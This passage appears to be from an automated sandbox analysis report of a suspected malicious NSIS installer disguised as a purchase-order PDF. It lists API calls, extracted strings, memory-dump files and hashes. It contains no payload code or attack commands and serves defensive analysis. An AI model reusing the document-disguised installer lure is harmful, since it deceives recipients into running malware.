                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F
                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                    • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                                    • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                                    • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                                    APIs
                                                                                                                                    • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                      • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                                    • wsprintfA.USER32 ref: 00405DFB
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                                    • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                    • API String ID: 222337774-899692902
                                                                                                                                    • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                    • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                                    • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                                    • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                                    • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                                    • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                                      • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                      • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                      • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,?,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                                      • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                      • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                                      • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: A
                                                                                                                                    • API String ID: 2624150263-3554254475
                                                                                                                                    • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                                    • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                                    • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                                    • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                      • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                      • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                    Strings
                                                                                                                                    • (*B, xrefs: 00402E7C
                                                                                                                                    • soft, xrefs: 00402EDC
                                                                                                                                    • Error launching installer, xrefs: 00402E3E
                                                                                                                                    • Null, xrefs: 00402EE5
                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                                                    • Inst, xrefs: 00402ED3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                    • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                    • API String ID: 4283519449-2478819026
                                                                                                                                    • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                                    • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                                    • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                                    • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                                                    APIs
                                                                                                                                    • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                    • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                    • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                                                    Strings
                                                                                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 900638850-730719616
                                                                                                                                    • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                                    • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                                    • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                                    • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                    • String ID: jA$ jA$... %d%%
                                                                                                                                    • API String ID: 551687249-2167919867
                                                                                                                                    • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                                    • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                                    • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                                    • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                                                    APIs
                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                                    • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                                    • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                                    • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
                                                                                                                                      • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405D21
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                    • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                                    • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                                    • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                    • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                                    • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                                    • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                                    • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                                    • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                    • String ID: f
                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                    • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                                    • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                                    • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                                    APIs
                                                                                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
                                                                                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                                                    • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                    Strings
                                                                                                                                    • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                    • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                    • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289693951.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289720615.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                    • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                                    • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                                    • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                                                    • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                                    APIs
                                                                                                                                    • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                                    • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                                    • CharNextW.USER32(0040A300,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                                    • CharPrevW.USER32(0040A300,0040A300,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289624666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000003.00000002.3289589572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000003.00000002.3289669979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
